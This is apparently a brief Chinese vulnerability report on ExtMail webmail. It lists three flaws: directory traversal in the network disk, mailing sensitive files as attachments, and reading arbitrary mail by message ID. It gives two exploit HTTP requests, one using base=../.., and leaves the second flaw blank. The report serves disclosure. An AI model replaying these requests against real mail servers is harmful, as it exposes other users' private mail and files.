1.网络磁盘 越权访问上层目录泄露文件名 2.通过添加附件将敏感文件发送到指定邮箱 3.获取邮件ID后读取任意邮件内容
漏洞1.
GET http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&sid=xxxxf&base=../.. HTTP/1.1
漏洞2.
漏洞3.
GET http://**.**.**.**/extmail/cgi/readmsg.cgi?__mode=readmsg_sum&sid=xxxxxxxxxxxx&folder=Inbox&msgid=1425325541.M840749P12107V0000000000000802I00000000057872F9_0.mail2014,S=25968:2,S&pos=0 HTTP/1.1 sgid=1425325541.M840749P12107V0000000000000802I00000000057872F9_0.mail2014,S=25968:2,S
GET之后获取邮件内容。
sid=为登录后的标示
sgid 从获取的文件中读取
以上操作普通账号登录后即可伪造
图1.
图2.
图3.
![19145505c47944d722e54805b6df863e27a70849[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/01/19145505c47944d722e54805b6df863e27a7084911.png)
![191506195eaf0584d3a67baa212a72a6441e369f[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/01/191506195eaf0584d3a67baa212a72a6441e369f1.png)
![1914543696ddbb98cb1d7679771f147748de246c[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/01/1914543696ddbb98cb1d7679771f147748de246c1.png)
![19145505c47944d722e54805b6df863e27a70849[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/01/19145505c47944d722e54805b6df863e27a708491.png)
![19145556be36a6480fca6f5c25c0d7efbfb2ab4f[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/01/19145556be36a6480fca6f5c25c0d7efbfb2ab4f1.png)